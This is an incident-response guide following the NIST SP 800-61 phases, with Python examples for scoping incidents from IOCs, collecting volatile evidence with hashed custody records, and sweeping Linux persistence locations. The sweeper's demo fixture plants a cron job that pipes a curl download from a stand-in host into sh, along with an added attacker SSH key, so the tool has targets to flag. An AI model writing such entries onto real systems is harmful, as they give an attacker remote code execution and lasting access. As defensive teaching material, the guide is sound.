// IR Lifecycle
The NIST SP 800-61 (Rev. 2) incident response lifecycle defines four phases that guide how an organisation responds to a security incident. Each phase feeds into the next, and the cycle repeats: lessons from post-incident review inform better preparation for the next incident. (The sections below split phase 3 into Containment and Eradication & Recovery, so they run 1 to 5.)
1. Preparation
Build capabilities before incidents happen: IR plans, playbooks, tooling, team training, and communication channels.
2. Detection & Analysis
Identify that an incident has occurred, determine its scope and severity, and gather enough information to make containment decisions.
3. Containment, Eradication & Recovery
Stop the attack from spreading, remove the threat, and restore systems to a known-good state, in a controlled, documented sequence.
4. Post-Incident Activity
Document what happened, review the response, identify gaps, and implement improvements: the lessons-learned loop.
// 1. Preparation
Preparation is the most important phase: the quality of everything else depends on it. Key preparation activities:
IR Plan components
| Component | Description |
|---|---|
| Incident classification matrix | Defines severity levels (P1 through P4) and the criteria for each |
| Escalation paths | Who to contact at each severity: SOC lead, CISO, legal, PR, executives |
| Contact list | Internal and external contacts: MSSP, law enforcement, threat intel vendors, forensics retainer |
| Playbooks | Type-specific response procedures: phishing, ransomware, insider threat, data breach |
| Asset inventory | Critical systems and their owners, needed to assess impact and prioritise response |
| Communication templates | Pre-approved messaging for internal and external notifications |
Jump bag (analyst toolkit)
| Tool | Purpose |
|---|---|
| Forensic imaging (FTK Imager, dd) | Create and hash a bit-for-bit disk image before any remediation on a compromised system |
| Memory capture (WinPmem, Magnet RAM Capture) | Capture volatile memory before power-off or reboot |
| Log collection scripts | Pull Windows event logs, prefetch, registry hives, browser artefacts |
| Hash verification (sha256sum, md5sum) | Verify integrity of collected evidence; prefer SHA-256 and use MD5 only to match legacy records |
| Network packet capture (tcpdump, Wireshark) | Capture live traffic during an active incident |
| Encrypted note-taking | Timestamped investigation notes, never stored on the compromised system |
// 2. Detection & Analysis
When an alert or report comes in, the first priority is to understand what you're dealing with (incident type, scope, severity) before taking any action. Acting before the scope is understood can tip off the attacker, prompt them to accelerate, or leave part of the intrusion uncontained so they simply return.
Common detection sources
| Source | What it detects |
|---|---|
| SIEM alerts | Correlation rules matching known attack patterns in log data |
| EDR / XDR alerts | Behavioural detections on endpoints: process injection, LSASS access, lateral movement |
| User reports | Phishing clicks, locked files, unusual pop-ups; often the first detection of ransomware |
| Help desk tickets | "My account is locked", "I can't access files": early indicators of compromise |
| Threat intel feeds | IOCs seen in your environment matching known malicious infrastructure |
| External notification | MSSP, CISA, a national CERT/CSIRT, or law enforcement reporting that your organisation has been compromised |
Severity classification (example)
| Severity | Criteria | Response time |
|---|---|---|
| P1 (Critical) | Active ransomware / confirmed breach of critical systems / data exfiltration in progress | Immediate, all hands |
| P2 (High) | Confirmed malware / credential theft / lateral movement detected | Within 1 hour |
| P3 (Medium) | Suspicious activity requiring investigation / policy violation | Within 4 hours |
| P4 (Low) | Informational / potential phishing / failed attack attempt | Next business day |
// Triage Checklist
Run through these questions at the start of every incident before deciding on actions:
INITIAL TRIAGE
[ ] What is the incident type? (Malware / Phishing / Data Breach / Insider / DDoS)
[ ] When did it start? (First-seen timestamp, recorded in UTC)
[ ] What is the severity? (P1 / P2 / P3 / P4)
[ ] Is the attack active or historical?
[ ] Which systems are affected? (Hostnames, IPs, business criticality)
[ ] Which user accounts are involved?
[ ] Is sensitive data at risk or confirmed exfiltrated?
[ ] Is this a single host, or has lateral movement occurred?
SCOPE QUESTIONS
[ ] Are other hosts showing the same IOCs in the SIEM?
[ ] Has the attacker established persistence?
[ ] Are there external communications (active C2)?
[ ] Is this a known malware family or campaign?
DECISIONS TO MAKE
[ ] Contain now (risk of tipping off the attacker) or observe longer?
[ ] Who needs to be notified? (Manager / Legal / PR / Executives)
[ ] Do we need law enforcement?
[ ] Are there regulatory notification obligations? (GDPR Art. 33: 72 hours to the supervisory authority; plus any sector or contractual obligations)
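As an added example (not code from the page or from NIST SP 800-61), the scope questions above run over a constructed SIEM export. The JSON-lines event format, the events, the hostnames and the IOC values are all assumptions made for the demo; in practice the export would come from your SIEM's search API.

```python
"""Scope an incident from a SIEM export against a set of IOCs.

Added example for the triage checklist; it is not code from NIST SP 800-61
or from any SIEM product. The event format (one JSON object per line with
ts/host/user/event/sha256/dst_ip/domain fields), the events themselves and
the IOC values are all constructed for the demo.
"""
import json
from datetime import datetime, timedelta, timezone

# Constructed SIEM export, UTC timestamps, oldest first.
SAMPLE_EVENTS = """\
{"ts":"2024-05-01T08:02:11Z","host":"WS-0412","user":"j.doe","event":"process","sha256":"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08","dst_ip":null,"domain":null}
{"ts":"2024-05-01T08:02:40Z","host":"WS-0412","user":"j.doe","event":"dns","sha256":null,"dst_ip":null,"domain":"update-cdn.example.net"}
{"ts":"2024-05-01T08:03:05Z","host":"WS-0412","user":"j.doe","event":"netconn","sha256":null,"dst_ip":"203.0.113.45","domain":null}
{"ts":"2024-05-01T08:15:00Z","host":"FS-01","user":"svc_backup","event":"logon","sha256":null,"dst_ip":null,"domain":null}
{"ts":"2024-05-01T09:47:22Z","host":"FS-01","user":"j.doe","event":"netconn","sha256":null,"dst_ip":"203.0.113.45","domain":null}
{"ts":"2024-05-01T10:10:09Z","host":"WS-0777","user":"m.lee","event":"process","sha256":"2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae","dst_ip":null,"domain":null}
"""

# Constructed IOC set (file hash, C2 address, C2 domain) for a hypothetical campaign.
IOCS = {
    "sha256": {"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"},
    "dst_ip": {"203.0.113.45"},
    "domain": {"update-cdn.example.net"},
}
C2_FIELDS = ("dst_ip", "domain")  # a match here means the host talked to attacker infrastructure


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_events(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = parse_ts(ev["ts"])
            events.append(ev)
    return events


def matched_ioc_types(ev):
    """IOC categories this event matches, e.g. ['dst_ip']; empty list if clean."""
    return [field for field, values in IOCS.items() if ev.get(field) in values]


def scope_incident(events, now, c2_window_hours=1):
    """Answer the scope questions: affected hosts/users, first seen, lateral movement, live C2.
    `now` is the analyst's current time as an ISO 8601 UTC string."""
    now = parse_ts(now)
    hits = sorted((ev for ev in events if matched_ioc_types(ev)), key=lambda e: e["ts"])
    hosts = sorted({ev["host"] for ev in hits})
    users = sorted({ev["user"] for ev in hits})
    c2_times = [ev["ts"] for ev in hits if any(f in matched_ioc_types(ev) for f in C2_FIELDS)]
    last_c2 = max(c2_times, default=None)
    return {
        "hosts": hosts,
        "users": users,
        "first_seen": hits[0]["ts"].isoformat() if hits else None,
        "last_seen": hits[-1]["ts"].isoformat() if hits else None,
        # More than one host carrying the same IOCs answers "single host?" with no.
        "lateral_movement": len(hosts) > 1,
        # Active vs historical: C2 traffic inside the window counts as live.
        "c2_active": last_c2 is not None and now - last_c2 <= timedelta(hours=c2_window_hours),
        # Timestamped entries ready to seed the post-incident timeline.
        "timeline": [(ev["ts"].isoformat(), ev["host"], ev["user"], ev["event"],
                      ",".join(matched_ioc_types(ev))) for ev in hits],
    }


if __name__ == "__main__":
    scope = scope_incident(parse_events(SAMPLE_EVENTS), now="2024-05-01T10:30:00Z")
    for key, value in scope.items():
        print(f"{key}: {value}")
```

On the sample data the result is two hosts (WS-0412 and FS-01, so lateral movement is yes), one account, first seen 08:02:11 UTC, and C2 still active because FS-01 reached the C2 address within the last hour. The same export reviewed a day later reports the C2 as historical: the active/historical answer depends on the window you choose, so record the window in the notes along with the answer.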
// 3. Containment
Containment stops the spread without fully shutting down the business. There are two tiers; they are applied in sequence, and how far you go with each depends on severity and business impact.
Short-term containment
Immediate actions to stop spread: isolate the compromised host in the EDR, block IOCs at the firewall, disable compromised accounts, reset credentials. Unless the host is actively destroying data, capture memory and network state first, because isolation or power-off destroys them.
Long-term containment
Broader protective measures while the investigation continues: network segmentation, enhanced monitoring on adjacent systems, patch deployment, out-of-band credential resets.
Containment actions by incident type
| Incident type | Immediate containment steps |
|---|---|
| Ransomware | Isolate affected hosts, disable affected network shares, block C2 IPs/domains at the firewall, identify patient zero, confirm backups are intact and were offline or immutable before trusting them |
| Credential theft | Disable/reset compromised accounts, force MFA re-registration, revoke active sessions and refresh tokens, check for persistence |
| Malware infection | Isolate host in EDR, quarantine malicious files, block hashes and C2 indicators, check for lateral movement |
| Data exfiltration | Block destination IPs at the firewall, isolate the source host, preserve logs (don't delete or rotate them), notify legal and the DPO |
| Phishing campaign | Block sender domain/IP, purge the message from all mailboxes, identify users who clicked or entered credentials, and check those accounts for follow-on compromise |
// Evidence Collection
Collect evidence in order of volatility � most volatile first. Once a system is powered off or reimaged, volatile data is lost permanently.
Order of volatility
| Priority | Data type | Why it's volatile |
|---|---|---|
| 1 (highest) | RAM / memory | Lost on power-off; holds running processes, encryption keys, network connections, plaintext credentials |
| 2 | Network connections (ss, netstat) | Active connections disappear when the session ends |
| 3 | Running processes (ps aux) | Malware may clean up on termination or system shutdown |
| 4 | Logged-in users, open files | Changes with sessions and file access |
| 5 | Disk image / log files | More stable, but still collect before reimaging |
| 6 (lowest) | Archived logs (SIEM) | Stored remotely; least likely to be lost |
Chain of custody. Every piece of evidence must be documented: who collected it, when (UTC), from which system, with which tool, and where it is stored. Hash evidence files immediately after collection and record the hash alongside the entry, so any later change is detectable. This is critical if the incident leads to legal action or a regulatory investigation.
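As an added example (not one of the tools named on this page), the collector below runs the volatile steps in the order of the table, hashes each output as soon as it is written, and records who/when/where/how in a manifest, then verifies that nothing has changed. The command list (Linux defaults), the case ID, the destination path and the collector name are assumptions; memory is expected to have been captured already with a dedicated tool.

```python
"""Collect volatile data most-volatile-first and keep a chain-of-custody manifest.

Added example for the evidence-collection section; it is not one of the tools
named above. The command list, the case ID, the destination path and the
collector name are assumptions (the defaults are Linux commands). Memory
should already have been captured with a dedicated tool such as WinPmem or
LiME before this runs, and the destination must be removable or network
storage, never the suspect host's own disk.
"""
import hashlib
import json
import os
import socket
import subprocess
from datetime import datetime, timezone

# Order of volatility: network state and process table first, then sessions
# and open files. Disk imaging and log pulls come afterwards with other tools.
DEFAULT_STEPS = [
    ("net_connections", ["ss", "-tanp"]),
    ("arp_cache", ["ip", "neigh"]),
    ("processes", ["ps", "auxww"]),
    ("logged_in_users", ["who", "-a"]),
    ("open_files", ["lsof", "-nP"]),
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def collect(dest, collector, steps=DEFAULT_STEPS, case_id="CASE-0000"):
    """Run each step in order, write its output under dest, hash it at once,
    and append who/when/where/how to the manifest."""
    os.makedirs(dest, exist_ok=True)
    items = []
    for name, cmd in steps:
        out_path = os.path.join(dest, f"{name}.txt")
        started = datetime.now(timezone.utc).isoformat()
        try:
            proc = subprocess.run(cmd, capture_output=True, timeout=60)
            data, rc = proc.stdout + proc.stderr, proc.returncode
        except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
            # A missing tool or a hung command is itself worth recording:
            # note it rather than silently skipping the step.
            data, rc = f"collection failed: {exc}\n".encode(), -1
        with open(out_path, "wb") as f:
            f.write(data)
        items.append({
            "case_id": case_id,
            "item": name,
            "source_host": socket.gethostname(),
            "collected_by": collector,
            "collected_at_utc": started,
            "tool": " ".join(cmd),
            "exit_code": rc,
            "path": out_path,
            "sha256": sha256_file(out_path),   # hashed immediately after writing
        })
    manifest_path = os.path.join(dest, "manifest.json")
    with open(manifest_path, "w") as f:
        json.dump(items, f, indent=2)
    # The manifest's own hash goes into the analyst's timestamped notes so the
    # manifest cannot be quietly rewritten later.
    return {"manifest_path": manifest_path, "manifest_sha256": sha256_file(manifest_path), "items": items}


def verify(manifest_path):
    """Re-hash every item in the manifest; return the names that no longer match."""
    with open(manifest_path) as f:
        items = json.load(f)
    return [i["item"] for i in items
            if not os.path.isfile(i["path"]) or sha256_file(i["path"]) != i["sha256"]]


if __name__ == "__main__":
    result = collect("/mnt/evidence/CASE-0000", collector="analyst@example.org")  # assumed destination
    print(result["manifest_path"], result["manifest_sha256"], "altered:", verify(result["manifest_path"]))
```

Running `verify` at hand-over (to a forensics retainer, legal, or a regulator) and logging the result is what turns the hashes into a usable chain of custody; a failed tool is kept in the manifest with exit code -1 so the gap in the collection is documented rather than invisible.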
// 4. Eradication & Recovery
Eradication removes the threat. Recovery restores normal operation. These happen after containment, once the full scope is understood.
Eradication steps
| Step | Description |
|---|---|
| Remove malware | Delete or quarantine all identified malicious files; confirm with AV/EDR that no detections remain |
| Remove persistence | Delete all persistence mechanisms: scheduled tasks, registry run keys, startup folders, services, cron jobs, WMI subscriptions, added SSH keys |
| Reset credentials | Reset all accounts that may have been compromised; don't skip service accounts or cloud identities |
| Revoke sessions/tokens | Force logout of all active sessions in identity providers; invalidate OAuth tokens and session cookies |
| Patch vulnerabilities | Apply patches for the vulnerability used for initial access; validate they're applied before reconnecting |
| Verify clean state | Run a full AV/EDR scan, review the process list and network connections, and re-check the original IOCs; confirm no remaining indicators |
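As an added example for the "Remove persistence" and "Verify clean state" steps (not a tool from this page), the sweep below walks common Linux persistence locations under a given root and flags entries that contain an IOC string or were modified at or after the incident's first-seen time. The location list follows standard Linux layouts; the demo tree, the IOC strings and the first-seen timestamp are constructed. Hits are leads for the analyst to review, not an automatic delete list.

```python
"""Sweep common Linux persistence locations for attacker-introduced entries.

Added example for the "Remove persistence" and "Verify clean state" steps;
not a tool named on the page. The location list follows standard Linux
layouts, and the demo tree, IOC strings and first-seen timestamp are
constructed. Point it at a mounted image or the live root ("/").
"""
import os
from datetime import datetime, timezone

# Directories whose every file is a persistence candidate, then single files.
PERSISTENCE_DIRS = ["etc/cron.d", "etc/cron.hourly", "etc/cron.daily",
                    "var/spool/cron/crontabs", "etc/systemd/system", "etc/init.d", "etc/profile.d"]
PERSISTENCE_FILES = ["etc/crontab", "etc/rc.local", "root/.bashrc", "root/.profile",
                     "root/.ssh/authorized_keys"]
USER_FILES = [".bashrc", ".profile", ".ssh/authorized_keys"]


def candidates(root):
    for d in PERSISTENCE_DIRS:
        full = os.path.join(root, d)
        if os.path.isdir(full):
            for name in sorted(os.listdir(full)):
                if os.path.isfile(os.path.join(full, name)):
                    yield os.path.join(full, name)
    for f in PERSISTENCE_FILES:
        if os.path.isfile(os.path.join(root, f)):
            yield os.path.join(root, f)
    home = os.path.join(root, "home")
    if os.path.isdir(home):
        for user in sorted(os.listdir(home)):
            for f in USER_FILES:
                if os.path.isfile(os.path.join(home, user, f)):
                    yield os.path.join(home, user, f)


def sweep(root, iocs, first_seen):
    """Flag candidates that contain an IOC string or were modified at/after
    first_seen (ISO 8601, UTC). Returns a list of {path, reasons} dicts."""
    cutoff = datetime.fromisoformat(first_seen.replace("Z", "+00:00"))
    findings = []
    for path in candidates(root):
        with open(path, "rb") as f:
            text = f.read().decode("utf-8", "replace")
        mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
        reasons = [f"contains IOC {ioc}" for ioc in iocs if ioc in text]
        if mtime >= cutoff:
            reasons.append(f"modified {mtime.isoformat()} (after first-seen)")
        if reasons:
            findings.append({"path": os.path.relpath(path, root), "reasons": reasons})
    return findings


def build_demo_tree(root):
    """Constructed filesystem: two benign, long-standing entries and two planted ones."""
    old = datetime(2023, 1, 10, tzinfo=timezone.utc).timestamp()
    planted = datetime(2024, 5, 1, 8, 30, tzinfo=timezone.utc).timestamp()
    files = {
        "etc/cron.d/backup": ("0 2 * * * root /usr/local/bin/backup.sh\n", old),
        "etc/systemd/system/nginx.service": ("[Service]\nExecStart=/usr/sbin/nginx\n", old),
        "etc/cron.d/.sysupdate": ("*/5 * * * * root curl -s http://update-cdn.example.net/a | sh\n", planted),
        "root/.ssh/authorized_keys": ("ssh-ed25519 AAAAC3NzaCONSTRUCTEDKEY ops@kali\n", planted),
    }
    for rel, (content, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(content)
        os.utime(path, (mtime, mtime))   # fix atime/mtime so the timeline check is deterministic
    return root


if __name__ == "__main__":
    root = build_demo_tree("persistence_demo")
    for finding in sweep(root, ["update-cdn.example.net", "203.0.113.45"], "2024-05-01T08:02:11Z"):
        print(finding["path"], "->", "; ".join(finding["reasons"]))
```

The planted cron job is caught twice (IOC match and post-first-seen modification) and the added SSH key only once, by its timestamp; the two long-standing entries are left alone. The timestamp test is what finds persistence that carries no known IOC, which is why the first-seen time from triage matters for eradication, and why mtime alone cannot be trusted where the attacker may have timestomped files.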
Recovery
Restore systems from known-good backups (verify backup integrity first). Reimage compromised hosts where there's any doubt about the completeness of eradication. Reconnect to the network incrementally, and monitor closely for 30+ days post-recovery for signs of re-infection or remaining access.
// 5. Post-Incident Activity
The post-incident review (PIR) is where you extract lasting value from the incident. Without it, you repeat the same mistakes.
Post-incident report contents
| Section | Contents |
|---|---|
| Executive summary | Plain-language summary of what happened, impact, and resolution, for non-technical leadership |
| Timeline | Chronological sequence from first indicator to closure, each event timestamped |
| Root cause | The initial access vector: unpatched vulnerability, phishing, weak credentials, misconfiguration |
| Impact | Systems affected, data accessed or exfiltrated, business disruption, financial impact |
| Response actions | Everything done to contain, eradicate, and recover, with the rationale for decisions made |
| Lessons learned | What worked, what didn't, and what needs to change |
| Recommendations | Prioritised action items to prevent recurrence, with owners and deadlines |
Run a blameless post-mortem. The goal is to improve processes, not assign fault. If people fear blame, they'll hide information. Psychological safety in incident reviews leads to more honest analysis and better preventive actions.
// Communication & Escalation
Never communicate about a live incident over channels you suspect are compromised. If email or Slack may be compromised, use out-of-band communication: phone, Signal, in-person. An attacker with access to your mail or chat can read the incident discussion to learn what you have found and adjust their behaviour or cover their tracks, so treat those channels as hostile until the investigation shows otherwise.
Escalation triggers
| Trigger | Who to notify |
|---|---|
| Personal data suspected or confirmed breached | DPO / Legal; GDPR Article 33 requires notifying the supervisory authority within 72 hours of becoming aware of the breach |
| Ransomware or critical system outage | CISO / Executives / Board � business continuity decisions needed |
| Nation-state or sophisticated threat actor | CISA, NCSC, or relevant national cyber agency |
| Criminal activity (fraud, extortion) | Law enforcement � FBI IC3, Action Fraud, local police |
| Customer or partner data at risk | Legal for breach notification obligations |
| Public-facing systems compromised | PR / Communications � manage public messaging |